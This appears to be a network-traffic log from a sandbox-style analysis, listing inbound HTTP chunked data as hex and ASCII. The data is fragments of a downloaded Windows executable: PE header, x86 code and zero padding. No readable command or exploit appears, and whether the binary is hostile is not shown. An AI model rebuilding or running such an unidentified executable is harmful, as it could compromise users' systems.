2023-07-27 18:19:34 UTC	325	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 17 17 58 88 76 79 0b 88 76 79 0b 88 76 79 0b e7 00 e7 0b 9e 76 79 0b e7 00 d2 0b af 76 79 0b e7 00 d3 0b fc 76 79 0b 81 0e ea 0b 81 76 79 0b 88 76 78 0b 1b 76 79 0b e7 00 d6 0b 89 76 79 0b e7 00 e3 0b 89 76 79 0b e7 00 e4 0b 89 76 79 0b 52 69 63 68 88 76 79 0b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3b 76 fa 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$XvyvyvyvyvyvyvyvxvyvyvyvyRichvyPEL;va
2023-07-27 18:19:34 UTC	332	IN	Data Raw: 6f 78 57 00 55 00 53 00 45 00 52 00 33 00 32 00 2e 00 44 00 4c 00 4c 00 00 00 00 00 20 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 27 00 00 00 20 43 6c 61 73 73 20 48 69 65 72 61 72 63 68 79 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 41 72 72 61 79 27 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 00 20 54 79 70 65 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 60 6c 6f 63 61 6c 20 73 74 61 74 69 63 20 74 68 72 65 61 64 20 67 75 61 72 64 27 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 Data Ascii: oxWUSER32.DLL Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vector vbase copy construc
2023-07-27 18:19:34 UTC	333	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	333	IN	Data Raw: 32 30 30 30 0d 0a 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75 72 65 27 00 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 20 63 6c 6f 73 75 72 65 27 00 00 60 6f 6d 6e 69 Data Ascii: 2000 initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vector destructor iterator'`managed vector constructor iterator'`placement delete[] closure'`placement delete closure'`omni
2023-07-27 18:19:34 UTC	341	IN	Data Raw: e5 13 00 00 59 c3 Data Ascii: Y
2023-07-27 18:19:34 UTC	341	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	341	IN	Data Raw: 32 30 30 30 0d 0a 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 95 1b 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 19 11 00 00 85 c0 74 0a e8 10 11 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 53 8b 5d 08 83 fb e0 77 6f 56 57 83 3d 94 9e 48 00 00 75 18 e8 93 20 00 00 6a 1e e8 dd 1e 00 00 68 ff 00 00 00 e8 ed 1b 00 00 59 59 85 db 74 04 8b c3 eb 03 33 c0 40 50 6a 00 ff 35 94 9e 48 00 ff 15 70 11 40 00 8b f8 85 ff 75 26 6a 0c 5e 39 05 04 a5 48 00 74 0d 53 e8 97 20 00 00 59 85 c0 75 a9 eb 07 e8 98 10 00 00 89 30 e8 91 10 00 00 89 30 8b c7 5f 5e eb 14 53 e8 76 20 00 00 59 e8 7d 10 00 00 c7 00 0c 00 00 00 33 c0 5b 5d c3 6a 08 68 b0 6f 42 00 e8 e0 18 00 00 33 c0 8b 75 08 33 db 3b f3 0f 95 c0 3b c3 75 16 e8 51 10 00 00 c7 00 16 00 Data Ascii: 2000UQeVEPuuu9EttM^US]woVW=Hu jhYYt3@Pj5Hp@u&j^9HtS Yu00_^Sv Y}3[]jhoB3u3;;uQ
2023-07-27 18:19:34 UTC	349	IN	Data Raw: c4 0c 85 c0 74 0c Data Ascii: t
2023-07-27 18:19:34 UTC	349	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	349	IN	Data Raw: 32 30 30 30 0d 0a 33 c0 50 50 50 50 50 e8 49 f9 ff ff 56 e8 69 5d 00 00 40 59 83 f8 3c 76 2a 56 e8 5c 5d 00 00 8d 04 45 94 9e 48 00 8b c8 2b ce 6a 03 d1 f9 68 4c 1d 40 00 2b d9 53 50 e8 72 5c 00 00 83 c4 14 85 c0 75 bd 68 44 1d 40 00 be 14 03 00 00 56 57 e8 e5 5b 00 00 83 c4 0c 85 c0 75 a5 ff b5 04 fe ff ff 56 57 e8 d1 5b 00 00 83 c4 0c 85 c0 75 91 68 10 20 01 00 68 f8 1c 40 00 57 e8 4e 5a 00 00 83 c4 0c eb 5e 53 53 53 53 53 e9 79 ff ff ff 6a f4 ff 15 8c 11 40 00 8b f0 3b f3 74 46 83 fe ff 74 41 33 c0 8a 0c 47 88 8c 05 08 fe ff ff 66 39 1c 47 74 08 40 3d f4 01 00 00 72 e8 53 8d 85 04 fe ff ff 50 8d 85 08 fe ff ff 50 88 5d fb e8 1e f1 ff ff 59 50 8d 85 08 fe ff ff 50 56 ff 15 ac 11 40 00 8b 4d fc 5f 5e 33 cd 5b e8 f2 eb ff ff c9 c3 6a 03 e8 01 5d 00 00 59 Data Ascii: 20003PPPPPIVi]@Y<v*V\]EH+jhL@+SPr\uhD@VW[uVW[uh h@WNZ^SSSSSyj@;tFtA3Gf9Gt@=rSPP]YPPV@M_^3[j]Y
2023-07-27 18:19:34 UTC	357	IN	Data Raw: 00 e8 ca be ff ff Data Ascii:
2023-07-27 18:19:34 UTC	357	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	357	IN	Data Raw: 32 30 30 30 0d 0a 83 25 b0 9e 48 00 00 83 c8 ff eb e4 33 c0 50 50 50 50 50 e8 3d d9 ff ff cc 8b ff 55 8b ec 51 8b 4d 10 53 33 c0 56 89 07 8b f2 8b 55 0c c7 01 01 00 00 00 39 45 08 74 09 8b 5d 08 83 45 08 04 89 13 89 45 fc 80 3e 22 75 10 33 c0 39 45 fc b3 22 0f 94 c0 46 89 45 fc eb 3c ff 07 85 d2 74 08 8a 06 88 02 42 89 55 0c 8a 1e 0f b6 c3 50 46 e8 0a 47 00 00 59 85 c0 74 13 ff 07 83 7d 0c 00 74 0a 8b 4d 0c 8a 06 ff 45 0c 88 01 46 8b 55 0c 8b 4d 10 84 db 74 32 83 7d fc 00 75 a9 80 fb 20 74 05 80 fb 09 75 9f 85 d2 74 04 c6 42 ff 00 83 65 fc 00 80 3e 00 0f 84 e9 00 00 00 8a 06 3c 20 74 04 3c 09 75 06 46 eb f3 4e eb e3 80 3e 00 0f 84 d0 00 00 00 83 7d 08 00 74 09 8b 45 08 83 45 08 04 89 10 ff 01 33 db 43 33 c9 eb 02 46 41 80 3e 5c 74 f9 80 3e 22 75 26 f6 c1 Data Ascii: 2000%H3PPPPP=UQMS3VU9Et]EE>"u39E"FE<tBUPFGYt}tMEFUMt2}u tutBe>< t<uFN>}tEE3C3FA>\t>"u&
2023-07-27 18:19:34 UTC	365	IN	Data Raw: 15 60 11 40 00 5d Data Ascii: `@]
2023-07-27 18:19:34 UTC	365	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	365	IN	Data Raw: 32 30 30 30 0d 0a c3 6a 0c 68 c8 72 42 00 e8 b3 b9 ff ff 33 ff 47 89 7d e4 33 db 39 1d 94 9e 48 00 75 18 e8 cf c0 ff ff 6a 1e e8 19 bf ff ff 68 ff 00 00 00 e8 29 bc ff ff 59 59 8b 75 08 8d 34 f5 20 98 42 00 39 1e 74 04 8b c7 eb 6d 6a 18 e8 c7 d5 ff ff 59 8b f8 3b fb 75 0f e8 ec b0 ff ff c7 00 0c 00 00 00 33 c0 eb 50 6a 0a e8 58 00 00 00 59 89 5d fc 39 1e 75 2b 68 a0 0f 00 00 57 ff 15 90 11 40 00 85 c0 75 17 57 e8 41 9e ff ff 59 e8 b7 b0 ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 26 9e ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 4c b9 ff ff c3 6a 0a e8 29 ff ff ff 59 c3 8b ff 55 8b ec 8b 45 08 56 8d 34 c5 20 98 42 00 83 3e 00 75 13 50 e8 23 ff ff ff 59 85 c0 75 08 6a 11 e8 14 be ff ff 59 ff 36 ff 15 5c 11 40 00 5e 5d c3 2d a4 03 Data Ascii: 2000jhrB3G}39Hujh)YYu4 B9tmjY;u3PjXY]9u+hW@uWAY]>W&YEELj)YUEV4 B>uP#YujY6\@^]-
2023-07-27 18:19:34 UTC	373	IN	Data Raw: 5d 08 83 fb fe 75 Data Ascii: ]u
2023-07-27 18:19:34 UTC	373	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	373	IN	Data Raw: 32 30 30 30 0d 0a 13 e8 40 91 ff ff c7 00 09 00 00 00 83 c8 ff e9 a1 00 00 00 85 db 78 08 3b 1d 04 e2 32 02 72 12 e8 21 91 ff ff c7 00 09 00 00 00 e8 77 99 ff ff eb da 8b c3 c1 f8 05 8d 3c 85 20 e2 32 02 8b f3 83 e6 1f c1 e6 06 8b 07 0f be 44 06 04 83 e0 01 74 ce 53 e8 cf fe ff ff 59 83 65 fc 00 8b 07 f6 44 06 04 01 74 31 53 e8 52 fe ff ff 59 50 ff 15 48 11 40 00 85 c0 75 0b ff 15 b0 10 40 00 89 45 e4 eb 04 83 65 e4 00 83 7d e4 00 74 19 e8 c7 90 ff ff 8b 4d e4 89 08 e8 aa 90 ff ff c7 00 09 00 00 00 83 4d e4 ff c7 45 fc fe ff ff ff e8 0c 00 00 00 8b 45 e4 e8 4b 99 ff ff c3 8b 5d 08 53 e8 02 ff ff ff 59 c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 64 a3 ff ff 8b 45 f0 83 b8 ac 00 00 00 01 7e 13 8d 45 f0 50 6a 04 ff 75 08 e8 7f 05 00 00 83 c4 0c eb 10 8b Data Ascii: 2000@x;2r!w< 2DtSYeDt1SRYPH@u@Ee}tMMEEK]SYUuMdE~EPju
2023-07-27 18:19:34 UTC	381	IN	Data Raw: 83 a4 24 80 00 00 Data Ascii: $
2023-07-27 18:19:34 UTC	381	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	381	IN	Data Raw: 31 66 66 38 0d 0a 00 fe 89 6c 24 7c c7 44 24 40 4c 33 40 00 c7 84 24 dc 30 00 00 01 00 00 00 8b 44 24 78 8b d8 3b c5 74 4b 8b 38 3b fd 74 3c 55 8d 4c 24 18 e8 00 59 ff ff 8b 47 04 3b c5 76 09 83 f8 ff 73 04 48 89 47 04 8b 77 04 f7 de 1b f6 f7 d6 8d 4c 24 14 23 f7 e8 04 59 ff ff 3b f5 74 0a 8b 16 8b 02 6a 01 8b ce ff d0 53 e8 dc 63 ff ff 83 c4 04 8d 4c 24 44 c7 84 24 dc 30 00 00 ff ff ff ff e8 0a 59 ff ff b8 d1 05 00 00 01 05 d4 e1 32 02 8b 0d d4 e1 32 02 51 6a 00 ff 15 e8 10 40 00 8b 35 c4 10 40 00 8b 3d ec 10 40 00 8b 2d a0 10 40 00 8b 1d a8 10 40 00 a3 7c 41 32 02 a1 d4 e1 32 02 c7 44 24 14 ab 82 96 00 83 f8 03 75 11 6a 00 6a 00 6a 00 ff 15 1c 10 40 00 a1 d4 e1 32 02 3d df 00 00 00 0f 85 ca 01 00 00 33 d2 8d 8c 24 a0 00 00 00 51 52 52 8d 84 24 dc 00 00 Data Ascii: 1ff8l$\|D$@L3@$0D$x;tK8;t<UL$YG;vsHGwL$#Y;tjScL$D$0Y22Qj@5@=@-@@\|A22D$ujjj@2=3$QRR$
2023-07-27 18:19:34 UTC	389	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	389	IN	Data Raw: 7d e0 03 89 75 d8 7c d3 8b f0 6a 02 c1 e6 02 8d 4d f8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 8b 35 48 99 48 00 4e 8d 46 01 99 83 e2 1f 03 c2 c1 f8 05 8d 56 01 81 e2 1f 00 00 80 89 45 d0 79 05 4a 83 ca e0 42 6a 1f 59 2b ca 33 d2 42 d3 e2 8d 5c 85 f0 89 4d d4 85 13 0f 84 82 00 00 00 83 ca ff d3 e2 f7 d2 85 54 85 f0 eb 05 83 7c 85 f0 00 75 08 40 83 f8 03 7c f3 eb 66 8b c6 99 6a 1f 59 23 d1 03 c2 c1 f8 05 81 e6 1f 00 00 80 79 05 4e 83 ce e0 46 83 65 d8 00 33 d2 2b ce 42 d3 e2 8d 4c 85 f0 8b 31 8d 3c 16 3b fe 72 04 3b fa 73 07 c7 45 d8 01 00 00 00 89 39 8b 4d d8 eb 1f 85 c9 74 1e 8d 4c 85 f0 8b 11 8d 72 01 33 ff 3b f2 72 05 83 fe 01 73 03 33 ff 47 89 31 8b cf 48 79 de 8b 4d d4 83 c8 ff d3 e0 21 03 8b 45 d0 40 83 f8 03 7d Data Ascii: }u\|jMZ+;\|1tdJy5HHNFVEyJBjY+3B\MT\|u@\|fjY#yNFe3+BL1<;r;sE9MtLr3;rs3G1HyM!E@}
2023-07-27 18:19:34 UTC	397	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	397	IN	Data Raw: 32 30 30 30 0d 0a 0f 84 90 00 00 00 6a 08 e8 fd 01 00 00 8b 45 10 59 b9 00 0c 00 00 23 c1 74 54 3d 00 04 00 00 74 37 3d 00 08 00 00 74 1a 3b c1 75 62 d9 ee 8b 4d 0c dc 19 df e0 dd 05 48 9d 48 00 f6 c4 05 7b 4c eb 48 d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7b 2c dd 05 48 9d 48 00 eb 32 d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7a 1e dd 05 48 9d 48 00 eb 1e d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7a 08 dd 05 38 9d 48 00 eb 08 dd 05 38 9d 48 00 d9 e0 dd 19 83 e6 fe e9 d6 00 00 00 a8 02 0f 84 ce 00 00 00 f6 45 10 10 0f 84 c4 00 00 00 33 f6 a8 10 74 02 8b f3 57 8b 7d 0c dd 07 d9 ee da e9 df e0 f6 c4 44 0f 8b 91 00 00 00 dd 07 8d 45 f8 50 51 51 dd 1c 24 e8 10 04 00 00 8b 4d f8 dd 5d ec 81 c1 00 fa ff ff 83 c4 0c 81 f9 ce fb ff ff 7d 0d dd 45 ec 8b f3 dc 0d 20 34 40 00 eb 53 Data Ascii: 2000jEY#tT=t7=t;ubMHH{LHM{,HH2MzHHMz8H8HE3tW}DEPQQ$M]}E 4@S
2023-07-27 18:19:34 UTC	405	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	405	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	405	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	413	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	413	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	413	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	421	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	421	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	421	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	429	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	429	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	429	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	437	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	437	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	437	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	445	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	445	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	445	IN	Data Raw: 31 66 66 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1ff8
2023-07-27 18:19:34 UTC	453	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	453	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	461	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	461	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	469	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	469	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	469	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	477	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	477	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	477	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	485	IN	Data Raw: 48 00 64 a9 48 00 Data Ascii: HdH
2023-07-27 18:19:34 UTC	485	IN	Data Raw: 0d 0a Data Ascii:
